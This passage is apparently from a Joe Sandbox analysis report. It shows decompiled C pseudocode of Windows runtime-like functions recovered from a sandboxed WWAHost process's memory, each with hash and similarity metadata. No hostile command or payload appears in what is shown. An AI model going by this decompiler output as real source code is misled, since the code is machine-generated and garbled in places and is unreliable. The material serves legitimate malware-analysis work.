                                              					_t11 = _t53 - 1; // 0x0
                                              					_t12 = _t53 - 1; // 0x0
                                              					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                              					E03A1AFDE( &_v12,  &_v16);
                                              					asm("lock xadd [eax], ecx");
                                              					asm("lock xadd [eax], ecx");
                                              					E03A1BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                              					_t55 = _v36;
                                              					_t88 = _v36;
                                              					if(E03977D50() == 0) {
                                              						_t40 = 0x7ffe0388;
                                              					} else {
                                              						_t55 = _v19;
                                              						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              					}
                                              					if( *_t40 != 0) {
                                              						E03A0FE3F(_t55, _t91, _v15, _t55);
                                              					}
                                              				} else {
                                              					if(_t86 == 0) {
                                              						E0396FFB0(_t50, _t86, _t50);
                                              						_t75 = _v16;
                                              					}
                                              					_push(_t58);
                                              					_t88 = 0;
                                              					_push(0);
                                              					E03A1A80D(_t91, 8, _t75, 0);
                                              				}
                                              				return _t88;
                                              			}























                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction ID: 7b960dee2c9e983a9cbf967b13d2ef656c4aa6d099b2af1f2edd332d840585d3
                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction Fuzzy Hash: EC31A3766047059BC719DF24C980E6BB7AAFBC4310F04892EF9968B780DA30E815C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 69%
                                              			E039D69A6(signed short* __ecx, void* __eflags) {
                                              				signed int _v8;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				signed int _v24;
                                              				signed short _v28;
                                              				signed int _v32;
                                              				intOrPtr _v36;
                                              				signed int _v40;
                                              				char* _v44;
                                              				signed int _v48;
                                              				intOrPtr _v52;
                                              				signed int _v56;
                                              				char _v60;
                                              				signed int _v64;
                                              				char _v68;
                                              				char _v72;
                                              				signed short* _v76;
                                              				signed int _v80;
                                              				char _v84;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t68;
                                              				intOrPtr _t73;
                                              				signed short* _t74;
                                              				void* _t77;
                                              				void* _t78;
                                              				signed int _t79;
                                              				signed int _t80;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t80;
                                              				_t75 = 0x100;
                                              				_v64 = _v64 & 0x00000000;
                                              				_v76 = __ecx;
                                              				_t79 = 0;
                                              				_t68 = 0;
                                              				_v72 = 1;
                                              				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                              				_t77 = 0;
                                              				if(L03966C59(__ecx[2], 0x100, __eflags) != 0) {
                                              					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                              					if(_t79 != 0 && E039D6BA3() != 0) {
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0x1f0003);
                                              						_push( &_v64);
                                              						if(E03999980() >= 0) {
                                              							E03972280(_t56, 0x3a48778);
                                              							_t77 = 1;
                                              							_t68 = 1;
                                              							if( *0x3a48774 == 0) {
                                              								asm("cdq");
                                              								 *(_t79 + 0xf70) = _v64;
                                              								 *(_t79 + 0xf74) = 0x100;
                                              								_t75 = 0;
                                              								_t73 = 4;
                                              								_v60 =  &_v68;
                                              								_v52 = _t73;
                                              								_v36 = _t73;
                                              								_t74 = _v76;
                                              								_v44 =  &_v72;
                                              								 *0x3a48774 = 1;
                                              								_v56 = 0;
                                              								_v28 = _t74[2];
                                              								_v48 = 0;
                                              								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                              								_v40 = 0;
                                              								_v32 = 0;
                                              								_v24 = 0;
                                              								_v16 = 0;
                                              								if(E0395B6F0(0x393c338, 0x393c288, 3,  &_v60) == 0) {
                                              									_v80 = _v80 | 0xffffffff;
                                              									_push( &_v84);
                                              									_push(0);
                                              									_push(_v64);
                                              									_v84 = 0xfa0a1f00;
                                              									E03999520();
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				if(_v64 != 0) {
                                              					_push(_v64);
                                              					E039995D0();
                                              					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                              					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                              				}
                                              				if(_t77 != 0) {
                                              					E0396FFB0(_t68, _t77, 0x3a48778);
                                              				}
                                              				_pop(_t78);
                                              				return E0399B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                              			}


                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ad89cacc850f3a482454d6618884282bd02bdbb84ec35ad0cff707c908689a6
                                              • Instruction ID: e7d8830c03fae66deee69abf49c3e93fb2b3a28883beb95c1006a2f3dbdf4954
                                              • Opcode Fuzzy Hash: 6ad89cacc850f3a482454d6618884282bd02bdbb84ec35ad0cff707c908689a6
                                              • Instruction Fuzzy Hash: 06417FB5E01308AFDB14DFA9D941BFEBBF8EF88714F04812AE954A7240DB759905CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E03955210(intOrPtr _a4, void* _a8) {
                                              				void* __ecx;
                                              				intOrPtr _t31;
                                              				signed int _t32;
                                              				signed int _t33;
                                              				intOrPtr _t35;
                                              				signed int _t52;
                                              				void* _t54;
                                              				void* _t56;
                                              				unsigned int _t59;
                                              				signed int _t60;
                                              				void* _t61;
                                              
                                              				_t61 = E039552A5(1);
                                              				if(_t61 == 0) {
                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                              					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                              					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                              				} else {
                                              					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                              					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                              				}
                                              				_t60 = _t59 >> 1;
                                              				_t32 = 0x3a;
                                              				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                              					_t52 = _t60 + _t60;
                                              					if(_a4 > _t52) {
                                              						goto L5;
                                              					}
                                              					if(_t61 != 0) {
                                              						asm("lock xadd [esi], eax");
                                              						if((_t32 | 0xffffffff) == 0) {
                                              							_push( *((intOrPtr*)(_t61 + 4)));
                                              							E039995D0();
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                              						}
                                              					} else {
                                              						E0396EB70(_t54, 0x3a479a0);
                                              					}
                                              					_t26 = _t52 + 2; // 0xddeeddf0
                                              					return _t26;
                                              				} else {
                                              					_t52 = _t60 + _t60;
                                              					if(_a4 < _t52) {
                                              						if(_t61 != 0) {
                                              							asm("lock xadd [esi], eax");
                                              							if((_t32 | 0xffffffff) == 0) {
                                              								_push( *((intOrPtr*)(_t61 + 4)));
                                              								E039995D0();
                                              								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                              							}
                                              						} else {
                                              							E0396EB70(_t54, 0x3a479a0);
                                              						}
                                              						return _t52;
                                              					}
                                              					L5:
                                              					_t33 = E0399F3E0(_a8, _t54, _t52);
                                              					if(_t61 == 0) {
                                              						E0396EB70(_t54, 0x3a479a0);
                                              					} else {
                                              						asm("lock xadd [esi], eax");
                                              						if((_t33 | 0xffffffff) == 0) {
                                              							_push( *((intOrPtr*)(_t61 + 4)));
                                              							E039995D0();
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                              						}
                                              					}
                                              					_t35 = _a8;
                                              					if(_t60 <= 1) {
                                              						L9:
                                              						_t60 = _t60 - 1;
                                              						 *((short*)(_t52 + _t35 - 2)) = 0;
                                              						goto L10;
                                              					} else {
                                              						_t56 = 0x3a;
                                              						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                              							 *((short*)(_t52 + _t35)) = 0;
                                              							L10:
                                              							return _t60 + _t60;
                                              						}
                                              						goto L9;
                                              					}
                                              				}
                                              			}


                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc81d71221fda62de887458573f1151f8438375fbe3b036687e014cbada4d2b7
                                              • Instruction ID: 7d67500da740cc297286baa5ffd5f0b2e86a4f04be385cdc934f35618bf379c8
                                              • Opcode Fuzzy Hash: fc81d71221fda62de887458573f1151f8438375fbe3b036687e014cbada4d2b7
                                              • Instruction Fuzzy Hash: F131C532651701ABCB21DB28CD41BABB7B9FF917A0F154A1AF8164B6E1E771E840C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E0398A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                              				intOrPtr _t35;
                                              				intOrPtr _t39;
                                              				intOrPtr _t45;
                                              				intOrPtr* _t51;
                                              				intOrPtr* _t52;
                                              				intOrPtr* _t55;
                                              				signed int _t57;
                                              				intOrPtr* _t59;
                                              				intOrPtr _t68;
                                              				intOrPtr* _t77;
                                              				void* _t79;
                                              				signed int _t80;
                                              				intOrPtr _t81;
                                              				char* _t82;
                                              				void* _t83;
                                              
                                              				_push(0x24);
                                              				_push(0x3a30220);
                                              				E039AD08C(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                              				_t79 = __ecx;
                                              				_t35 =  *0x3a47b9c; // 0x0
                                              				_t55 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                              				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                              				if(_t55 == 0) {
                                              					_t39 = 0xc0000017;
                                              					L11:
                                              					return E039AD0D1(_t39);
                                              				}
                                              				_t68 = 0;
                                              				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                              				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                              				_t7 = _t55 + 8; // 0x8
                                              				_t57 = 6;
                                              				memcpy(_t7, _t79, _t57 << 2);
                                              				_t80 = 0xfffffffe;
                                              				 *(_t83 - 4) = _t80;
                                              				if(0 < 0) {
                                              					L14:
                                              					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                              					L20:
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                              					_t39 = _t81;
                                              					goto L11;
                                              				}
                                              				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                              					_t81 = 0xc000007b;
                                              					goto L20;
                                              				}
                                              				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                              					_t59 =  *((intOrPtr*)(_t83 + 8));
                                              					_t45 =  *_t59;
                                              					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                              					 *_t59 = _t45 + 1;
                                              					L6:
                                              					 *(_t83 - 4) = 1;
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                              					 *(_t83 - 4) = _t80;
                                              					if(_t68 < 0) {
                                              						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                              						if(_t82 == 0) {
                                              							goto L14;
                                              						}
                                              						asm("btr eax, ecx");
                                              						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                              						if( *_t82 != 0) {
                                              							 *0x3a47b10 =  *0x3a47b10 - 8;
                                              						}
                                              						goto L20;
                                              					}
                                              					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                              					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                              					_t51 =  *0x3a4536c; // 0xb5ebe0
                                              					if( *_t51 != 0x3a45368) {
                                              						_push(3);
                                              						asm("int 0x29");
                                              						goto L14;
                                              					}
                                              					 *_t55 = 0x3a45368;
                                              					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                              					 *_t51 = _t55;
                                              					 *0x3a4536c = _t55;
                                              					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                              					if(_t52 != 0) {
                                              						 *_t52 = _t55;
                                              					}
                                              					_t39 = 0;
                                              					goto L11;
                                              				}
                                              				_t77 =  *((intOrPtr*)(_t83 + 8));
                                              				_t68 = E0398A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                              				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                              				if(_t68 < 0) {
                                              					goto L14;
                                              				}
                                              				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                              				goto L6;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d18db3c7d82362d65164ffa27a7d5da64e5656964864a451e67f20d74723640
                                              • Instruction ID: ab8a5aa5f90a2fcf310d08c322bfbd04191336c99eb3c7aaeefddb391779b56c
                                              • Opcode Fuzzy Hash: 7d18db3c7d82362d65164ffa27a7d5da64e5656964864a451e67f20d74723640
                                              • Instruction Fuzzy Hash: 32418CB9E00249DFCB14EF58C490B99BBF1FF89700F1980AAE804AF344D775A901CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03993D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				signed short** _t33;
                                              				short* _t38;
                                              				intOrPtr* _t39;
                                              				intOrPtr* _t41;
                                              				signed short _t43;
                                              				intOrPtr* _t47;
                                              				intOrPtr* _t53;
                                              				signed short _t57;
                                              				intOrPtr _t58;
                                              				signed short _t60;
                                              				signed short* _t61;
                                              
                                              				_t47 = __ecx;
                                              				_t61 = __edx;
                                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                              				if(_t60 > 0xfffe) {
                                              					L22:
                                              					return 0xc0000106;
                                              				}
                                              				if(__edx != 0) {
                                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                              						L5:
                                              						E03967B60(0, _t61, 0x39311c4);
                                              						_v12 =  *_t47;
                                              						_v12 = _v12 + 0xfff8;
                                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                              						E03967B60(0xfff8, _t61,  &_v12);
                                              						_t33 = _a8;
                                              						if(_t33 != 0) {
                                              							 *_t33 = _t61;
                                              						}
                                              						_t12 =  &(_t61[2]); // 0x0
                                              						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                              						_t53 = _a12;
                                              						if(_t53 != 0) {
                                              							_t57 = _t61[2];
                                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                              							while(_t38 >= _t57) {
                                              								if( *_t38 == 0x5c) {
                                              									_t41 = _t38 + 2;
                                              									if(_t41 == 0) {
                                              										break;
                                              									}
                                              									_t58 = 0;
                                              									if( *_t41 == 0) {
                                              										L19:
                                              										 *_t53 = _t58;
                                              										goto L7;
                                              									}
                                              									 *_t53 = _t41;
                                              									goto L7;
                                              								}
                                              								_t38 = _t38 - 2;
                                              							}
                                              							_t58 = 0;
                                              							goto L19;
                                              						} else {
                                              							L7:
                                              							_t39 = _a16;
                                              							if(_t39 != 0) {
                                              								 *_t39 = 0;
                                              								 *((intOrPtr*)(_t39 + 4)) = 0;
                                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                              							}
                                              							return 0;
                                              						}
                                              					}
                                              					_t61 = _a4;
                                              					if(_t61 != 0) {
                                              						L3:
                                              						_t43 = L03974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                              						_t61[2] = _t43;
                                              						if(_t43 == 0) {
                                              							return 0xc0000017;
                                              						}
                                              						_t61[1] = _t60;
                                              						 *_t61 = 0;
                                              						goto L5;
                                              					}
                                              					goto L22;
                                              				}
                                              				_t61 = _a4;
                                              				if(_t61 == 0) {
                                              					return 0xc000000d;
                                              				}
                                              				goto L3;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bea9ffefc0790a0e72c9a1d2d1c0567ed1a16337cfd29c56eaeeca19d2dd532
                                              • Instruction ID: 593c8b9703bcdd517050bee60269acaaa1cef70ad3ad8b49937db36d5a9f682a
                                              • Opcode Fuzzy Hash: 2bea9ffefc0790a0e72c9a1d2d1c0567ed1a16337cfd29c56eaeeca19d2dd532
                                              • Instruction Fuzzy Hash: 8731B03AA15615DFEB24CF6DC491A6BBBE9EF85740709846EE84ACB350E730D840C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E0397C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                              				signed int* _v8;
                                              				char _v16;
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed char _t33;
                                              				signed char _t43;
                                              				signed char _t48;
                                              				signed char _t62;
                                              				void* _t63;
                                              				intOrPtr _t69;
                                              				intOrPtr _t71;
                                              				unsigned int* _t82;
                                              				void* _t83;
                                              
                                              				_t80 = __ecx;
                                              				_t82 = __edx;
                                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                              				if((_t33 & 0x00000001) != 0) {
                                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                              					if(E03977D50() != 0) {
                                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              					} else {
                                              						_t43 = 0x7ffe0386;
                                              					}
                                              					if( *_t43 != 0) {
                                              						_t43 = E03A28D34(_v8, _t80);
                                              					}
                                              					E03972280(_t43, _t82);
                                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                                              						E0396FFB0(_t62, _t80, _t82);
                                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                              						_t30 = _t80 + 0xd0; // 0xd0
                                              						_t83 = _t30;
                                              						E03A28833(_t83,  &_v16);
                                              						_t81 = _t80 + 0x90;
                                              						E0396FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                              						_t63 = 0;
                                              						_push(0);
                                              						_push(_t83);
                                              						_t48 = E0399B180();
                                              						if(_a4 != 0) {
                                              							E03972280(_t48, _t81);
                                              						}
                                              					} else {
                                              						_t69 = _v8;
                                              						_t12 = _t80 + 0x98; // 0x98
                                              						_t13 = _t69 + 0xc; // 0x575651ff
                                              						E0397BB2D(_t13, _t12);
                                              						_t71 = _v8;
                                              						_t15 = _t80 + 0xb0; // 0xb0
                                              						_t16 = _t71 + 8; // 0x8b000cc2
                                              						E0397BB2D(_t16, _t15);
                                              						E0397B944(_v8, _t62);
                                              						 *((char*)(_t80 + 0xdc)) = 0;
                                              						E0396FFB0(0, _t80, _t82);
                                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                              						 *(_t80 + 0xde) = 0;
                                              						if(_a4 == 0) {
                                              							_t25 = _t80 + 0x90; // 0x90
                                              							E0396FFB0(0, _t80, _t25);
                                              						}
                                              						_t63 = 1;
                                              					}
                                              					return _t63;
                                              				}
                                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                              				if(_a4 == 0) {
                                              					_t24 = _t80 + 0x90; // 0x90
                                              					E0396FFB0(0, __ecx, _t24);
                                              				}
                                              				return 0;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction ID: dc2e3251fc30ab3b299de85c58887e0b19c38905c0f3c237ac62f701666d3e0f
                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction Fuzzy Hash: A6313C76701686BED704EBB4D490BEAFB5CBF82244F08456AD41C5B381DB38A945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E039D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                              				signed int _v8;
                                              				char _v588;
                                              				intOrPtr _v592;
                                              				intOrPtr _v596;
                                              				signed short* _v600;
                                              				char _v604;
                                              				short _v606;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed short* _t55;
                                              				void* _t56;
                                              				signed short* _t58;
                                              				signed char* _t61;
                                              				char* _t68;
                                              				void* _t69;
                                              				void* _t71;
                                              				void* _t72;
                                              				signed int _t75;
                                              
                                              				_t64 = __edx;
                                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                              				_v8 =  *0x3a4d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                              				_t55 = _a16;
                                              				_v606 = __ecx;
                                              				_t71 = 0;
                                              				_t58 = _a12;
                                              				_v596 = __edx;
                                              				_v600 = _t58;
                                              				_t68 =  &_v588;
                                              				if(_t58 != 0) {
                                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                              					if(_t55 != 0) {
                                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                              					}
                                              				}
                                              				_t8 = _t71 + 0x2a; // 0x28
                                              				_t33 = _t8;
                                              				_v592 = _t8;
                                              				if(_t71 <= 0x214) {
                                              					L6:
                                              					 *((short*)(_t68 + 6)) = _v606;
                                              					if(_t64 != 0xffffffff) {
                                              						asm("cdq");
                                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                              						 *((char*)(_t68 + 0x28)) = _a4;
                                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                              						 *((char*)(_t68 + 0x29)) = _a8;
                                              						if(_t71 != 0) {
                                              							_t22 = _t68 + 0x2a; // 0x2a
                                              							_t64 = _t22;
                                              							E039D6B4C(_t58, _t22, _t71,  &_v604);
                                              							if(_t55 != 0) {
                                              								_t25 = _v604 + 0x2a; // 0x2a
                                              								_t64 = _t25 + _t68;
                                              								E039D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                              							}
                                              							if(E03977D50() == 0) {
                                              								_t61 = 0x7ffe0384;
                                              							} else {
                                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              							}
                                              							_push(_t68);
                                              							_push(_v592 + 0xffffffe0);
                                              							_push(0x402);
                                              							_push( *_t61 & 0x000000ff);
                                              							E03999AE0();
                                              						}
                                              					}
                                              					_t35 =  &_v588;
                                              					if( &_v588 != _t68) {
                                              						_t35 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                              					}
                                              					L16:
                                              					_pop(_t69);
                                              					_pop(_t72);
                                              					_pop(_t56);
                                              					return E0399B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                              				}
                                              				_t68 = L03974620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                              				if(_t68 == 0) {
                                              					goto L16;
                                              				} else {
                                              					_t58 = _v600;
                                              					_t64 = _v596;
                                              					goto L6;
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26680469786ec93d72413127b0874a5803a4e981555311d06941077a0ce43cf2
                                              • Instruction ID: fe41617ef6252542d886db55d5939c8319719afccfbf0ba51ae9c7448a3337fc
                                              • Opcode Fuzzy Hash: 26680469786ec93d72413127b0874a5803a4e981555311d06941077a0ce43cf2
                                              • Instruction Fuzzy Hash: BD31A6766047519BC320DFA8C941A7BB7E9FFC8740F088A29F8958B690E730E904C7A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E0398A70E(intOrPtr* __ecx, char* __edx) {
                                              				unsigned int _v8;
                                              				intOrPtr* _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t16;
                                              				intOrPtr _t17;
                                              				intOrPtr _t28;
                                              				char* _t33;
                                              				intOrPtr _t37;
                                              				intOrPtr _t38;
                                              				void* _t50;
                                              				intOrPtr _t52;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t52 =  *0x3a47b10; // 0x9
                                              				_t33 = __edx;
                                              				_t48 = __ecx;
                                              				_v12 = __ecx;
                                              				if(_t52 == 0) {
                                              					 *0x3a47b10 = 8;
                                              					 *0x3a47b14 = 0x3a47b0c;
                                              					 *0x3a47b18 = 1;
                                              					L6:
                                              					_t2 = _t52 + 1; // 0xa
                                              					E0398A990(0x3a47b10, _t2, 7);
                                              					asm("bts ecx, eax");
                                              					 *_t48 = _t52;
                                              					 *_t33 = 1;
                                              					L3:
                                              					_t16 = 0;
                                              					L4:
                                              					return _t16;
                                              				}
                                              				_t17 = L0398A840(__edx, __ecx, __ecx, _t52, 0x3a47b10, 1, 0);
                                              				if(_t17 == 0xffffffff) {
                                              					_t37 =  *0x3a47b10; // 0x9
                                              					_t3 = _t37 + 0x27; // 0x30
                                              					__eflags = _t3 >> 5 -  *0x3a47b18; // 0x1
                                              					if(__eflags > 0) {
                                              						_t38 =  *0x3a47b9c; // 0x0
                                              						_t4 = _t52 + 0x27; // 0x30
                                              						_v8 = _t4 >> 5;
                                              						_t50 = L03974620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                              						__eflags = _t50;
                                              						if(_t50 == 0) {
                                              							_t16 = 0xc0000017;
                                              							goto L4;
                                              						}
                                              						 *0x3a47b18 = _v8;
                                              						_t8 = _t52 + 7; // 0x10
                                              						E0399F3E0(_t50,  *0x3a47b14, _t8 >> 3);
                                              						_t28 =  *0x3a47b14; // 0x77577b0c
                                              						__eflags = _t28 - 0x3a47b0c;
                                              						if(_t28 != 0x3a47b0c) {
